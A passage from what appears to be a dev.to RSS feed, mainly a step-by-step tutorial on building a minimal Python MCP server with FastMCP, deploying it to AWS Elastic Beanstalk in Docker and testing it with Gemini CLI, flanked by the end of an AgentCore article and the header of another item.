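# A random UUID string is 36 characters (32 hex digits plus 4 hyphens),
# comfortably above the 33-character minimum for --session-id.
session_id = str(uuid.uuid4())
assert len(session_id) == 36
print(session_id)
```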

&lt;h3&gt;
  
  
  Example output
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Optimizing subject lines for: Q3 Lapsed Customer Reactivation

[round 1]
  83.0  Ready to rediscover your favorite things? Claim 25% off now
        (LEN_ACCEPTABLE_20_60, URGENCY_BASE_LIFT, VALUE_PERCENT_OFF)
  80.0  Unlock 25% off – your loyalty reward is ready to claim
        (LEN_ACCEPTABLE_20_60, VALUE_PERCENT_OFF, LOYALTY_LANGUAGE)
  ...
  pruned: 3
  guidance for next round: Avoid overly conversational openings...

[round 2]
  91.2  Claim your 25% loyalty reward – 14 days to save
        (LEN_SWEET_SPOT_30_50, LOYALTY_LANGUAGE)
  ...

=== Final shortlist ===
1. Claim your 25% loyalty reward – 14 days to save
   score 91.2   open-rate band 42.0–50.0%
   ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The final chunk is a machine-readable JSON object with the full shortlist, per-round logs, and plateau status.&lt;/p&gt;
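
&lt;p&gt;If you capture that final chunk, it parses with the standard &lt;code&gt;json&lt;/code&gt; module. The field names below (&lt;code&gt;shortlist&lt;/code&gt;, &lt;code&gt;plateaued&lt;/code&gt;) are assumptions for illustration, not the documented schema; check the payload your deployment actually emits:&lt;/p&gt;

```python
import json

# Illustrative payload only -- the field names here are assumptions,
# not the project's documented schema.
final_chunk = (
    '{"shortlist": [{"subject": "Claim your 25% loyalty reward", '
    '"score": 91.2}], "plateaued": false}'
)

result = json.loads(final_chunk)
best = max(result["shortlist"], key=lambda c: c["score"])
print(best["subject"], best["score"])
```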

&lt;blockquote&gt;
&lt;p&gt;There is currently no built-in UI in the AWS console to browse memory contents. A community-built tool called &lt;strong&gt;AgentCore Memory Browser&lt;/strong&gt; fills this gap.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nwfqoxg0hj2930bz2bt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nwfqoxg0hj2930bz2bt.png" alt=" " width="800" height="493"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqcldl972s83wmmtyrop.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqcldl972s83wmmtyrop.png" alt=" " width="800" height="354"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing thoughts
&lt;/h2&gt;

&lt;p&gt;The thing I keep coming back to is that AgentCore doesn't have an opinion about what the agent should look like. Bedrock Agents did, and the opinion was reasonable for a lot of cases. AgentCore gives you a Runtime, a Memory service, a set of primitives, and trusts you to assemble them. &lt;strong&gt;That trust is the feature.&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>bedrock</category>
      <category>agentcore</category>
      <category>aws</category>
      <category>ai</category>
    </item>
    <item>
      <title>MCP Development with Amazon Elastic Beanstalk (EBS)</title>
      <dc:creator>xbill</dc:creator>
      <pubDate>Fri, 08 May 2026 21:56:56 +0000</pubDate>
      <link>https://dev.to/aws-builders/mcp-development-with-amazon-elastic-beanstalk-ebs-4049</link>
      <guid>https://dev.to/aws-builders/mcp-development-with-amazon-elastic-beanstalk-ebs-4049</guid>
      <description>&lt;p&gt;Leveraging Gemini CLI and the underlying Gemini LLM to build Model Context Protocol (MCP) AI applications with Python from a local development environment deployed to the EBS service on AWS.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffom6jxu5nxvinzpzekga.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffom6jxu5nxvinzpzekga.jpeg" width="800" height="437"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Yet another Python MCP Demo?
&lt;/h4&gt;

&lt;p&gt;Yes — thanks for asking.&lt;/p&gt;

&lt;p&gt;Python has traditionally been the main coding language for ML and AI tools. The goal of this article is to provide a minimal, working MCP server that can be run locally without any unneeded extra code or extensions.&lt;/p&gt;

&lt;h4&gt;
  
  
  What Is Python?
&lt;/h4&gt;

&lt;p&gt;Python is an interpreted language that allows for rapid development and testing, and it has deep libraries for ML and AI work:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.python.org/" rel="noopener noreferrer"&gt;Welcome to Python.org&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Python Version Management
&lt;/h4&gt;

&lt;p&gt;One of the downsides of the wide deployment of Python has been managing the language versions across platforms and maintaining a supported version.&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;pyenv&lt;/strong&gt; tool enables deploying consistent versions of Python:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/pyenv/pyenv" rel="noopener noreferrer"&gt;GitHub - pyenv/pyenv: Simple Python version management&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As of this writing, the mainstream Python version is 3.13. To validate your current Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;admin@ip-172-31-70-211:~/gemini-cli-aws/mcp-lightsail-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;python &lt;span class="nt"&gt;--version&lt;/span&gt;
&lt;span class="go"&gt;Python 3.13.12
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Gemini CLI
&lt;/h4&gt;

&lt;p&gt;If it is not pre-installed, you can install the Gemini CLI to interact with the source files and provide real-time assistance:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; @google/gemini-cli
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Testing the Gemini CLI Environment
&lt;/h4&gt;

&lt;p&gt;Once you have all the tools and the correct Node.js version in place, you can test the startup of Gemini CLI. You will need to authenticate with an API key or your Google account:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;gemini
&lt;span class="go"&gt;
 ▝▜▄ Gemini CLI v0.40.1
   ▝▜▄
  ▗▟▀ Signed in with Google /auth
 ▝▀ Plan: Gemini Code Assist Standard /upgrade
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Node Version Management
&lt;/h4&gt;

&lt;p&gt;Gemini CLI needs a consistent, up-to-date version of Node.js. The &lt;strong&gt;nvm&lt;/strong&gt; tool can be used to get a standard Node environment:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/nvm-sh/nvm" rel="noopener noreferrer"&gt;GitHub - nvm-sh/nvm: Node Version Manager - POSIX-compliant bash script to manage multiple active node.js versions&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Python MCP Documentation
&lt;/h4&gt;

&lt;p&gt;The official GitHub Repo provides samples and documentation for getting started:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/modelcontextprotocol/python-sdk" rel="noopener noreferrer"&gt;GitHub - modelcontextprotocol/python-sdk: The official Python SDK for Model Context Protocol servers and clients&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most common MCP Python deployment path uses the FastMCP library:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://gofastmcp.com/getting-started/welcome" rel="noopener noreferrer"&gt;Welcome to FastMCP - FastMCP&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Docker Version Management
&lt;/h4&gt;

&lt;p&gt;The AWS CLI tools and Lightsail extensions need a current version of Docker. If your environment does not provide a recent Docker build, the Docker Version Manager (dvm) can be used to download the latest supported Docker:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://howtowhale.github.io/dvm/install.html" rel="noopener noreferrer"&gt;Install&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  AWS Elastic Beanstalk
&lt;/h4&gt;

&lt;p&gt;AWS Elastic Beanstalk is a Platform-as-a-Service (PaaS) used for deploying and scaling web applications and services into the &lt;a href="https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html" rel="noopener noreferrer"&gt;Amazon Web Services (AWS) Cloud&lt;/a&gt;. [&lt;a href="https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html" rel="noopener noreferrer"&gt;1&lt;/a&gt;, &lt;a href="https://www.geeksforgeeks.org/devops/introduction-to-aws-elastic-beanstalk/" rel="noopener noreferrer"&gt;2&lt;/a&gt;]&lt;/p&gt;

&lt;p&gt;It simplifies the development process by allowing you to upload your application code while the service automatically manages the complex infrastructure details.&lt;/p&gt;

&lt;p&gt;More details are here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://aws.amazon.com/elasticbeanstalk/?trk=a19b69e7-8662-424a-ac1b-3e5f0e4c91a8&amp;amp;sc_channel=ps&amp;amp;ef_id=Cj0KCQjwk_bPBhDXARIsACiq8R0I-AqWs0x0mR8WGk5urYYwySiGzG5YcEaNwwB1pRQUZzZS_VOaUJ4aAkLFEALw_wcB:G:s&amp;amp;s_kwcid=AL!4422!3!795794191909!e!!g!!what%20is%20elastic%20beanstalk!23527793966!192204323946&amp;amp;gad_campaignid=23527793966&amp;amp;gbraid=0AAAAADjHtp-EpX3b2rsVjctzFISpDb0R8&amp;amp;gclid=Cj0KCQjwk_bPBhDXARIsACiq8R0I-AqWs0x0mR8WGk5urYYwySiGzG5YcEaNwwB1pRQUZzZS_VOaUJ4aAkLFEALw_wcB" rel="noopener noreferrer"&gt;Web App Deployment - AWS Elastic Beanstalk - AWS&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The EBS console looks similar to this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3l8z6kgyhj54ot6dg0x3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3l8z6kgyhj54ot6dg0x3.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  AWS CLI
&lt;/h4&gt;

&lt;p&gt;The AWS CLI provides a command line tool to directly access AWS services from your current environment. Full details on the CLI are available here:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-install-software.html" rel="noopener noreferrer"&gt;Install Docker, AWS CLI, and the Lightsail Control plugin for containers&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Where do I start?
&lt;/h4&gt;

&lt;p&gt;The strategy for starting MCP development is an incremental, step-by-step approach.&lt;/p&gt;

&lt;p&gt;First, the basic development environment is set up with the required system variables and a working Gemini CLI configuration.&lt;/p&gt;

&lt;p&gt;Then, a minimal Hello World-style Python MCP server is built with HTTP transport. This server is validated with Gemini CLI in the local environment.&lt;/p&gt;

&lt;p&gt;This setup validates the connection from Gemini CLI to the local process via MCP. The MCP client (Gemini CLI) and the Python MCP server both run in the same local environment.&lt;/p&gt;

&lt;p&gt;Next, the MCP server is wrapped in a Docker container and deployed to AWS Elastic Beanstalk. This remote deployment is validated with Gemini CLI running as an MCP client.&lt;/p&gt;

&lt;h4&gt;
  
  
  Setup the Basic Environment
&lt;/h4&gt;

&lt;p&gt;At this point you should have a working Python interpreter and a working Gemini CLI installation. The next step is to clone the GitHub samples repository with support scripts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~
git clone https://github.com/xbill9/gemini-cli-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run &lt;strong&gt;init.sh&lt;/strong&gt; from the cloned directory.&lt;/p&gt;

&lt;p&gt;The script will attempt to determine your shell environment and set the correct variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;gemini-cli-aws
&lt;span class="nb"&gt;source &lt;/span&gt;init.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your session times out or you need to re-authenticate, you can run the &lt;strong&gt;set_env.sh&lt;/strong&gt; script to reset your environment variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;gemini-cli-aws
&lt;span class="nb"&gt;source &lt;/span&gt;set_env.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Variables like &lt;code&gt;PROJECT_ID&lt;/code&gt; need to be set up for use in the various build scripts, so the &lt;strong&gt;set_env.sh&lt;/strong&gt; script can be used to reset the environment if your session times out.&lt;/p&gt;
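
&lt;p&gt;A small guard catches a missing variable before a build script fails halfway through. A sketch, assuming only &lt;code&gt;PROJECT_ID&lt;/code&gt; from the text above; extend the list for any other variables your scripts need:&lt;/p&gt;

```python
import os

# Fail fast if required environment variables are missing.
# PROJECT_ID is the variable mentioned above; extend the list as needed.
REQUIRED = ["PROJECT_ID"]

def check_env(required=REQUIRED):
    """Return the names of required variables that are unset or empty."""
    return [name for name in required if not os.environ.get(name)]

os.environ["PROJECT_ID"] = "demo-project"  # simulate a configured shell
print(check_env())  # an empty list means the environment is ready
```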

&lt;h4&gt;
  
  
  Hello World with HTTP Transport
&lt;/h4&gt;

&lt;p&gt;One of the key features that the standard MCP libraries provide is abstracting various transport methods.&lt;/p&gt;

&lt;p&gt;The high-level MCP tool implementation is the same regardless of which low-level transport the MCP client uses to connect to an MCP server.&lt;/p&gt;

&lt;p&gt;The simplest transport that the SDK supports is the stdio (stdin/stdout) transport, which connects to a locally running process. Both the MCP client and MCP server must be running in the same environment.&lt;/p&gt;

&lt;p&gt;The HTTP transport allows the MCP client and server to run in the same environment or to be distributed over the Internet.&lt;/p&gt;
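
&lt;p&gt;Under either transport, the messages themselves are JSON-RPC 2.0. A stdlib-only sketch of the request shape an MCP client sends to invoke a tool; the tool name and arguments are placeholders:&lt;/p&gt;

```python
import json

# Shape of an MCP "tools/call" request. MCP messages are JSON-RPC 2.0,
# regardless of whether they travel over stdio or HTTP.
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {"name": "greet", "arguments": {"name": "world"}},
}

wire = json.dumps(request)
print(wire)
```

&lt;p&gt;This is what the SDK builds and parses for you; the transport only decides where the bytes go.&lt;/p&gt;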

&lt;p&gt;The connection over HTTP will look similar to this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;mcp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;transport&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;0.0.0.0&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Running the Python Code
&lt;/h4&gt;

&lt;p&gt;First, switch to the directory with the Python MCP sample code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~/gemini-cli-aws/mcp-ebs-python-aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Refresh the AWS credentials:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;aws login &lt;span class="nt"&gt;--remote&lt;/span&gt;
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;source &lt;/span&gt;save-aws-creds.sh 
&lt;span class="go"&gt;Exporting AWS credentials...
Successfully saved credentials to .aws_creds
The Makefile will now automatically use these for deployments.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run the deploy target from the local system:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make deploy
&lt;span class="go"&gt;Creating Lightsail instance mcp-vps-python-aws...
Instance already exists or creation in progress.
Waiting for instance mcp-vps-python-aws to reach 'running' state...
Instance is running.

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can validate the final result by checking the messages:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;  Environment Status: mcp-server-eb-env
   * Status: Ready
   * Health: Green
   * Platform: Docker running on 64bit Amazon Linux 2/4.8.2
   * Deployed Version: app-260508_165941877951
   * CNAME: mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com

  Recent Events
  The environment was recently created and updated successfully:
   * 20:56:10: createEnvironment started.
   * 20:59:32: Initial instance deployment completed.
   * 20:59:38: Successfully launched environment.
   * 21:00:03: Subsequent instance deployment completed successfully.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can then get the endpoint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt; &amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;make endpoint
&lt;span class="go"&gt;
  Retrieving Application Endpoint: Retrieving the public endpoint URL of the Elastic Beanstalk environment.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ Shell make endpoint │
│ │
│ http://mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com │
│ │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ The public endpoint for your Elastic Beanstalk environment is:

  http://mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The service will be visible in the AWS console:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx87hrzizoj7hg847eh82.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx87hrzizoj7hg847eh82.png" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Gemini CLI settings.json
&lt;/h4&gt;

&lt;p&gt;Once you have the deployed endpoint, update the Gemini CLI MCP settings:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"mcp-ebs-python-aws"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"httpUrl"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"http://mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com/mcp/"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
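&lt;p&gt;If you script this settings update, a small helper can generate the entry. The following is a minimal sketch (the &lt;code&gt;build_mcp_settings&lt;/code&gt; helper is illustrative and not part of the project); it simply reproduces the JSON shown above from a server name and an Elastic Beanstalk CNAME:&lt;/p&gt;

```python
import json

def build_mcp_settings(server_name: str, eb_cname: str) -> dict:
    """Build the Gemini CLI "mcpServers" settings entry for one remote server.

    Hypothetical helper for illustration; the server name and CNAME below
    come from this tutorial's deployment and should be replaced with yours.
    """
    return {
        "mcpServers": {
            server_name: {
                # The streamable-HTTP endpoint is served under /mcp/
                "httpUrl": f"http://{eb_cname}/mcp/"
            }
        }
    }

settings = build_mcp_settings(
    "mcp-ebs-python-aws",
    "mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com",
)
print(json.dumps(settings, indent=2))
```

Writing the output into the actual Gemini CLI settings file is left to you, since its location varies by installation.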



&lt;h4&gt;
  
  
  Remote MCP Server Testing
&lt;/h4&gt;

&lt;p&gt;Restart Gemini CLI and check for the new MCP tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;xbill@penguin:~/gemini-cli-aws/mcp-ebs-python-aws$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;gemini
&lt;span class="go"&gt;
 ▝▜▄ Gemini CLI v0.41.2
   ▝▜▄
  ▗▟▀ Signed in with Google /auth
 ▝▀ Plan: Gemini Code Assist Standard /upgrade

🟢 mcp-ebs-python-aws - Ready (1 tool)
  Tools:
  - mcp_mcp-ebs-python-aws_greet

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then the remote MCP tool running on Elastic Beanstalk can be called:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt; &amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;mcp_mcp-ebs-python-aws_greet Hello Beanstalk!
&lt;span class="go"&gt;
  Topic: Executing the greet tool to verify the MCP server functionality.

╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ ✓ greet (mcp-ebs-python-aws MCP Server) {"param":"Hello Beanstalk!"} │
│ │
│ Hello, Hello Beanstalk!! │
╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

✦ Hello, Hello Beanstalk!!
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Gemini CLI can also summarize the deployment:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; summarize the deployment

✦ The mcp-ebs-python-aws project is a Python-based Model Context Protocol (MCP) server deployed to AWS Elastic Beanstalk (EB) using Docker.

  Deployment Architecture
   * Server Framework: Built with FastMCP and Starlette, providing an asynchronous foundation for MCP tools and standard HTTP endpoints.
   * Infrastructure: Uses the Elastic Beanstalk Docker platform, which automatically handles capacity provisioning, load balancing, and
     auto-scaling.
   * Compute: Defaults to t3.micro instances in the us-east-1 region.

  Deployment Workflow (make deploy)
  The deployment is automated via a Makefile and deploy.sh script:
   1. Validation: Runs unit tests using pytest to ensure code quality before deployment.
   2. Initialization: Uses the EB CLI (eb init) to configure the project for the AWS Docker platform.
   3. Provisioning: Creates the environment (eb create) if it doesn't exist, setting up the required AWS resources (ALB, ASG, EC2).
   4. Updates: Deploys code changes (eb deploy), which triggers a Docker build and rolling update on the EB instances.

  Key Endpoints
  Once deployed, the environment provides:
   * MCP SSE Transport: http://&amp;lt;eb-cname&amp;gt;/mcp
   * Health Check: http://&amp;lt;eb-cname&amp;gt;/health (used by EB for monitoring)
   * Root Info: http://&amp;lt;eb-cname&amp;gt;/

  Management Commands
   * make status: Displays the current health of the EB environment and recent deployment events.
   * make endpoint: Retrieves the public URL of the deployed server.
   * make aws-destroy: Terminates the environment and all associated AWS resources to stop billing.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
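&lt;p&gt;All of the endpoints in that summary are derived from the single EB CNAME. As a minimal sketch (the &lt;code&gt;eb_endpoints&lt;/code&gt; helper is illustrative, not part of the project), the same URLs can be built programmatically:&lt;/p&gt;

```python
def eb_endpoints(cname: str) -> dict:
    """Derive the key service URLs from an Elastic Beanstalk CNAME.

    Illustrative helper; the CNAME below is this tutorial's example value,
    so substitute the one printed by `make endpoint`.
    """
    base = f"http://{cname}"
    return {
        "mcp": f"{base}/mcp",        # MCP transport
        "health": f"{base}/health",  # used by EB for monitoring
        "root": f"{base}/",          # root info
    }

urls = eb_endpoints("mcp-server-eb-env.eba-ce3smmqd.us-east-1.elasticbeanstalk.com")
for name, url in urls.items():
    print(f"{name}: {url}")
```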



&lt;h4&gt;
  
  
  Summary
&lt;/h4&gt;

&lt;p&gt;The strategy of using Python for MCP development with Gemini CLI on Amazon Elastic Beanstalk was validated with an incremental, step-by-step approach.&lt;/p&gt;

&lt;p&gt;This MCP server was then deployed to Amazon Elastic Beanstalk. The local copy of Gemini CLI was used as an MCP client to validate the connection.&lt;/p&gt;

&lt;p&gt;This approach can be extended to more complex deployments using other MCP transports and cloud-based options.&lt;/p&gt;

</description>
      <category>agents</category>
      <category>elasticbeanstalk</category>
      <category>mcps</category>
      <category>gemini</category>
    </item>
    <item>
      <title>What AgentCore Managed Harness Takes Over, What It Leaves to You</title>
      <dc:creator>Kento IKEDA</dc:creator>
      <pubDate>Fri, 08 May 2026 21:03:13 +0000</pubDate>
      <link>https://dev.to/aws-builders/what-agentcore-managed-harness-takes-over-what-it-leaves-to-you-1je6</link>
      <guid>https://dev.to/aws-builders/what-agentcore-managed-harness-takes-over-what-it-leaves-to-you-1je6</guid>
